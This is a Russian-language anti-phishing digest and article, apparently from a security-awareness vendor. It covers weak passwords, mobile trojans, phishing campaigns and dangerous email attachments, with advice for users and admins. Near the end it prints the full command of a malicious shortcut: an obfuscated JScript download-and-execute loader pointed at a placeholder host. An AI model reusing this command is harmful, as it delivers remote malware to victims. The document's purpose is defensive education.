Мы открываем регулярный информационный дайджест, в котором будем рассказывать об актуальных технологиях фишинга и других атаках на человека.

В этот выпуск включены новости c 24 по 31 января 2017 года.

Андрей Жаркевич
редактор, руководитель службы ИТ

Пароли

Компания SplashData провела исследование самых популярных паролей 2016 года. На первом месте по прежнему печально известный пароль «123456», на подбор которого уходит несколько секунд. В десятку вошли также «12345», «password», «12345678» и «qwerty».

Если человека заставляют придумывать длинный пароль, скорее всего, он составит его из нескольких словарных слов и добавит пару цифр в конце. Возможно, каждое слово будет написано с большой буквы для большей безопасности. К сожалению, атаки Combo и Hybrid легко справляются с такими паролями, поэтому даже 12 символов не спасут: пароль «securityobjectivesbulletin» на обычном компьютере был подобран за несколько секунд.

По данным «Лаборатории Касперского», каждый шестой россиянин сталкивался с компрометацией пароля, но несмотря на это 35% жителей РФ используют одинаковый логин и пароль на всех ресурсах.

Через уязвимость в форуме хакеры украли адреса почты и хеши паролей 1 миллиона поклонников игры Clash of Clans. Это плохая новость для тех, кто везде использует одинаковый пароль: похищенные данные могут использовать для взлома почты и аккаунтов в социальных сетях.

Мобильная безопасность

Новый Андроид-троян внедряется в активный процесс Плей-Маркета, крадет уникальный идентификатор мобильного гаджета и учетной записи его владельца, коды авторизации для подключения к каталогу Google Play и иную конфиденциальную информацию. Добытые сведения вместе с технической информацией об устройстве отправляются на управляющий сервер злоумышленников.

Новый вымогатель блокирует Андроид-смартфон и требует за разблокировку 545 тысяч рублей. Вымогатель говорит только по-русски и требует ввести номер кредитки прямо на заблокированном экране.

Мошенники рассылали в Вайбере сообщения о списании денежных средств с карты. Получатели перезванивали по указанному номеру телефона и сообщали фальшивым сотрудникам банка сведения, достаточные для того, чтобы мошенники действительно списали деньги с их счета.

Социальные сети и почта

Пользователи Фейсбука получают сообщение с темой «Вы на этом видео» и просьбой перейти по ссылке. Ссылка ведет на поддельную страницу авторизации, которая собирает учётные данные пользователей.

Оперативники Хамас под видом симпатичной девушки в Фейсбуке убедили израильских солдат установить на смартфоны приложение-шпион и получили полный доступ к контактам, микрофону и камере:

Новая фишинговая кампания против пользователей Gmail. Письма содержат вредоносную ссылку, которая выглядит как вложенный документ:

В результате даже продвинутые пользователи не замечают обман и могут ввести свой пароль на фишинговом аналоге Gmail. Адрес, на который ведет ссылка, начинается со следующего фрагмента кода:

data:text/html,https://accounts/google.com

что может ввести пользователя в заблуждение и заставит поверить, что он все еще находится на настоящем сайте Google:

На самом деле, для открытия фишинговой страницы в новой вкладке используется специальный скрипт, который крадет пароли и отправляет их хакерам.

Пользователям Chrome стоит опасаться сообщений «шрифт не найден». Поверх страницы, которая становится нечитаемой из-за действий скрипта, атакующие выводят всплывающее окно, которое сообщает жертве, что на ее компьютере не хватает некоего специфического шрифта, и для нормальной работы ресурса шрифт необходимо скачать и установить. Закрыть это окно, нажав на крестик в углу, не получится:

Платежные системы

Проведённое по заказу Citrix исследование выявило, что 61% крупных компаний Великобритании заплатили кибервымогателям крупные выкупы за устранение несуществующей угрозы. Злоумышленники связываются с жертвой, сообщают ей, что системы предприятия якобы заражены вымогательским ПО, и требуют выкуп за «ключ шифрования».

Специалисты компании ESET и их коллеги из ИБ-фирмы CYREN предупреждают о двух новых фишинговых кампаниях. Первая кампания ориентирована на пользователей PayPal. Атака начинается с фишингового письма, имитирующего официальное сообщение сервиса. Клиента предупреждают о подозрительной активности и предлагают подтвердить личность, чтобы вернуть доступ к аккаунту PayPal. Грамматические ошибки в письме указывают на то, что автор не является носителем английского языка, но неопытных пользователей это редко наводит на подозрения. По ссылке клиент попадает на фишинговый сайт, который украдет пароль от PayPal.

Вторая кампания, обнаруженная CYREN, выглядит не менее убедительно для неискушенных пользователей. Мошенники присылают жертвам письма, озаглавленные «Уведомление о безналичном банковском переводе», «Обновление платежа» или «Swift копия». Если пользователь открывает письмо, внутри он находит уведомление о банковском переводе, якобы поступившем в его адрес. При этом послание замаскировано под официальное сообщение от сингапурского банка DBS или банка Emirates NBD:

Все ваши сотрудники прошли обучение по безопасности. Каждый из них сдал тест на высокий балл. Стала ли ваша компания более защищенной?

Зависит от того, какие навыки остались у сотрудников.

Что в реальной ситуации сделает пользователь, которому придет специально подготовленное фишинговое письмо?

Сергей Волдохин
sv@antiphish.ru

Плохой сценарий

На это рассчитывают мошенники, когда отправляют такие письма:

Во вложении и по ссылке может быть вредоносная программа, которая заразит компьютер и даст хакеру удаленный доступ, или зашифрует все данные и потребует выкуп.

Статья: Что нужно знать о фишинге

Хороший сценарий

Так будет, если у сотрудников появились необходимые навыки:

В этом сценарии пользователь не только не становится жертвой, но и помогает выявить активную атаку на вашу компанию.

Что делать, если вы не прошли курс

Антифишинг помогает обучить пользователей и контролирует их навыки безопасной работы, в том числе — навык правильной реакции на фишинговые письма.

Для тех, кто не прошел обучение, мы подготовили два информационных плаката. Они помогут узнать несложные, но популярные примеры фишинговых атак:

Фишинг с вложенным файлом

Фишинг с вредоносной ссылкой

Вы можете распечатывать или пересылать эти плакаты своим сотрудникам, коллегам или партнерам.

Надеемся, эти несложные схемы помогут сохранить ваши системы и данные в безопасности.

Опытные пользователи знают, что через почту им могут прислать вирус или троянскую программу. Мошенники, в свою очередь, стараются сделать так, чтобы вредоносные вложения выглядели как можно более безобидно.

В статье мы покажем примеры опасных вложений и объясним, на что стоит обращать внимание, чтобы не стать жертвой. Статья будет полезна пользователям и системным администраторам.

Сергей Волдохин
sv@antiphish.ru

«Традиционный» вредоносный файл

Вирус или троянскую программу пользователи обычно представляют как исполняемый файл с расширением .ехе под Виндовс или .dmg под Мак.

Такая вредоносная программа, приложенная к письму, может не определяться антивирусом, но почти все почтовые серверы умеют фильтровать подобные вложения: письмо с .ехе-файлом просто не будет отправлено. Чтобы обойти это ограничение, мошенникам бывает достаточно упаковать исполняемый файл в архив:

Что делать пользователю: получив любое вложение в архиве, распакуйте его в отдельную папку и проверьте тип вложенного файла. Не открывайте файлы типа Приложение, даже если ваш антивирус не против.

Администратору. Постарайтесь ограничить прием почты с исполняемыми файлами, даже если они упакованы в архив. При настройке ограничений стоит ориентироваться на формат файла, а не его расширение.

Вредоносный скрипт

Кроме традиционных программ, операционная система Виндоус умеет выполнять так называемые скрипты — программы, написанные на специальном языке программирования, например JScript или WBScript.

У таких языков есть ряд ограничений, но написанная на них вредоносная программа вполне способна зашифровать все файлы на диске или скачать полноценного троянца.

О существовании скриптов знает еще меньше пользователей, а мошенники стараются скрыть настоящий тип файла: например, через длинное или вызывающее доверие название:





Источник

Пользователю: Не открывайте файл, тип которого содержит слова «скрипт», «сценарий» или что-то непонятное. И даже если ваш антивирус не имеет ничего против.

Администратору: постарайтесь заблокировать исполнение скриптов, или хотя бы переопределить их обработчики. Файл .js, для которого обработчиком назначен notepad.exe — неплохая помощь антивирусу и защита для невнимательных пользователей.

Офисный документ

Пользователям бывает сложно поверить, но файлы Ворд или Эксель тоже могут быть вредоносными. Наиболее популярная схема — вредоносная программа запускается через макрос, который пользователю предлагается разрешить к выполнению под разумным предлогом. Например, если содержимое документа некорректно отображается:

Источник

Пользователю: не разрешайте выполнение макросов в документах, которые вам присылают по электронной почте. Особенно если не знаете отправителя и не уверены в содержании макроса.

Администратору: по возможности отключите исполнение макросов на компьютерах пользователей. Те, кому это действительно необходимо для работы, дадут вам знать. Вовремя обновляйте все офисные программы — кроме макросов, вредоносная программа может выполниться через эксплойт к одной из многих публичных RCE-уязвимостей.

Опасный ярлык

Иногда во вложении вовсе может не быть вредоносной программы. Вместо нее мошенники присылают ярлык, перейдя по которому пользователь сам загрузит и запустит вредоносную программу:

В свойствах этого ярлыка прописана команда, которая загрузит и запустит вредоносный .js-скрипт из интернета. Все, что нужно для загрузки и запуска, уже содержится в операционной системе.

Пользователю: ярлыки, которым вы можете доверять, находятся на вашем рабочем столе. Не стоит запускать файл с типом Ярлык, который вам прислали по электронной почте. Даже если его название вызывает доверие.

Администратору: постарайтесь заблокировать исполнение любого командного интрпретатора под учетной записью пользователя. По возможности переопределите его имя и путь — вредоносным программам будет сложнее сориентироваться. Обратите внимание на полное содержимое вредоносного ярлыка:

%windir%\system32\cmd.exe /c REM.>3.txt&echo var ty= new ActiveXObject("Msxml2.ServerXMLHTTP.6.0");ty["\x6F\x70\x65\x6E"]("\x47\x45\x54","http://<url>.com/src/gate.php?a");ty["\x73\x65\x6E\x64"]();eval(ty["responseText"]);>3.txt&ren 3.txt 3.js&3.js

Вредоносная ссылка

Иногда мошенники не рискуют высылать вложенный файл, а вместо этого добавляют в письмо вредоносную ссылку. Благодаря оформлению, такая ссылка выглядит похожей на «безопасный» вложенный файл:

Обе ссылки около «заявки» ведут на вредоносный файл.

Пользователю: умейте отличать вложенный файл от ссылки, которая ведет на внешний сайт. Наведите курсор и посмотрите, куда на самом деле ведет «ссылка на документ».

Администратору: постарайтесь ограничить загрузку исполняемых файлов на прокси-сервере. Аналогично вложениям, ориентируйтесь на тип файла, а не расширение.

Выводы

1. Мошенники используют самые разные форматы вредоносных вложений.
2. Не открывайте никакие вложения и не переходите по ссылкам, в которых не уверены.
3. По возможности ограничьте запуск скриптов, командных интерпретаторов и загрузку небезопасных типов файлов.
4. Обучайте своих пользователей основам информационной безопасности. Для начала можно переслать ссылку на эту статью.
5. Тренируйте и контролируйте практические навыки противодействия фишингу.